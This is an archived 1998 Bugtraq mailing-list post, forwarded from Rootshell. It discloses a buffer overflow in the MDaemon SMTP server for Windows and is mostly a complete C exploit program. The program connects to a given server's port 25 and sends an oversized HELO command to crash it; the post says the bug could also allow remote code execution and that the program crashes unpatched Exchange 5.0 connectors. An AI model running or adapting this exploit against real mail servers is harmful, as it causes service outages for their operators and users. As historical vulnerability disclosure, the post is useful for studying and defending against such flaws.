Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1998_1

Bugtraq archives for 1st quarter (Jan-Mar) 1998: MDaemon SMTP Server Buffer Overflow's

MDaemon SMTP Server Buffer Overflow's

Aleph One (aleph1DFW.NET)
Wed, 11 Mar 1998 00:44:45 -0600

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Alan Cox: "Re: the purpose of dynamic memory allocation"
Previous message: Alvaro Martinez Echevarria: "DoS (and possibly more) on MDaemon for NT/95"
Next in thread: Suman_Saraf: "Security problem in Slackware."

[ forwarded from rootshell ]

Since a similar bug was just released about the MDaemon Config Manager on
Bugtraq, we decided to release our MDaemon exploit early.  After the exploit
you will find the original Bugtraq post.  Note that MDaemon has known about
this bug since February.  Look for our upcoming paper on SMTP server
security.

/*
 * MDaemon SMTP server for Windows buffer overflow exploit
 *
 * http://www.mdaemon.com - if you dare...
 *
 * Tested on MDaemon 2.71 SP1
 *
 * http://www.rootshell.com/
 *
 * Released 3/10/98
 *
 * (C) 1998 Rootshell All Rights Reserved
 *
 * For educational use only.  Distribute freely.
 *
 * Note: This exploit will also crash the Microsoft Exchange 5.0 SMTP mail
 *       connector if SP2 has NOT been installed.
 *
 * Danger!
 *
 * A malicous user could use this bug to execute arbitrary code on the
 * remote system.
 *
 */

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

void main(int argc, char *argv[])
{
  struct sockaddr_in sin;
  struct hostent *hp;
  char *buffer;
  int sock, i;

  if (argc != 2) {
    printf("usage: %s <smtp server>\n", argv[0]);
    exit(1);
  }
  hp = gethostbyname(argv[1]);
  if (hp==NULL) {
    printf("Unknown host: %s\n",argv[1]);
    exit(1);
  }
  bzero((char*) &sin, sizeof(sin));
  bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
  sin.sin_family = hp->h_addrtype;
  sin.sin_port = htons(25);
  sock = socket(AF_INET, SOCK_STREAM, 0);
  connect(sock,(struct sockaddr *) &sin, sizeof(sin));
  buffer = (char *)malloc(10000);
  sprintf(buffer, "HELO ");
  for (i = 0; i<4096; i++)
    strcat(buffer, "x");
  strcat(buffer, "\r\n");
  write(sock, &buffer[0], strlen(buffer));
  close(sock);
  free(buffer);
}

-- cut here --

Rootshell Note: The config manager appears to run on port 8081 and is
configurable.  In the version that we tested (2.71 SP1) this buffer overflow
did not exist in the remote config manager, and required a remote version of
3.7 and not 3.0.

Next message: Alan Cox: "Re: the purpose of dynamic memory allocation"
Previous message: Alvaro Martinez Echevarria: "DoS (and possibly more) on MDaemon for NT/95"
Next in thread: Suman_Saraf: "Security problem in Slackware."